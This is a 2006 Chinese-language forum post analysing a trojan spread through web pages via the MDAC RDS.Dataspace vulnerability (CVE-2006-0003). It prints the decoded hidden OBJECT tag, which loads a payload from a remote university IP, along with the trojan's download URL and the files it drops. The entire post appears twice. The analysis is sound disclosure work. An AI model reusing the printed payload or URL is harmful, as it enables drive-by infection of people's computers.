hcchen
2006-11-12, 11:36 PM
Microsoft Windows MDAC 漏洞 - CVE-2006-0003:
作? ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
洞的攻擊者可以完全控制受影響的系統。以下?使用此漏洞通過網頁散播木馬
--------------------------------------------------------------------------
2個網站的木馬來源均指向"中央大學遠距教學網"
Http://140.115.135.135/magic/_ken/4x6/COMET.Exe
比較特別的是將文件解碼後發現以下的語法:
<BODY scroll=yes>
<OBJECT style="DISPLAY: none" type=text/x-scriptlet height=0 width=0 data=mk:@MSITStore:mhtml:c:\.mht!
http://140.115.135.135/magic/_ken/4x6/hepl.txt::/%23%2E%68%74m></OBJECT></BODY>
</html>
木馬植入及相關行為:
下載檔案及位置:
COMET.Exe
C:\Documents and Settings\user\Local Settings\Temporary Internet Files
之後更名轉存:
svchost.Exe
C:\Documents and Settings\user\Local Settings\Temp
自動執行後產生之檔案及位置:
C:\MP.EXE
C:\windows\loados.exe
C:\windows\mcsdos32.dll
造成 explorer.exe 程式錯誤。
造成 drwtsn32.exe 大量偵測及程式錯誤。
2者的錯誤造成幾乎當機的狀態。
其他:未知。
贊助商連結
作? ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
洞的攻擊者可以完全控制受影響的系統。以下?使用此漏洞通過網頁散播木馬
--------------------------------------------------------------------------
2個網站的木馬來源均指向"中央大學遠距教學網"
Http://140.115.135.135/magic/_ken/4x6/COMET.Exe
比較特別的是將文件解碼後發現以下的語法:
<BODY scroll=yes>
<OBJECT style="DISPLAY: none" type=text/x-scriptlet height=0 width=0 data=mk:@MSITStore:mhtml:c:\.mht!
http://140.115.135.135/magic/_ken/4x6/hepl.txt::/%23%2E%68%74m></OBJECT></BODY>
</html>
木馬植入及相關行為:
下載檔案及位置:
COMET.Exe
C:\Documents and Settings\user\Local Settings\Temporary Internet Files
之後更名轉存:
svchost.Exe
C:\Documents and Settings\user\Local Settings\Temp
自動執行後產生之檔案及位置:
C:\MP.EXE
C:\windows\loados.exe
C:\windows\mcsdos32.dll
造成 explorer.exe 程式錯誤。
造成 drwtsn32.exe 大量偵測及程式錯誤。
2者的錯誤造成幾乎當機的狀態。
其他:未知。
贊助商連結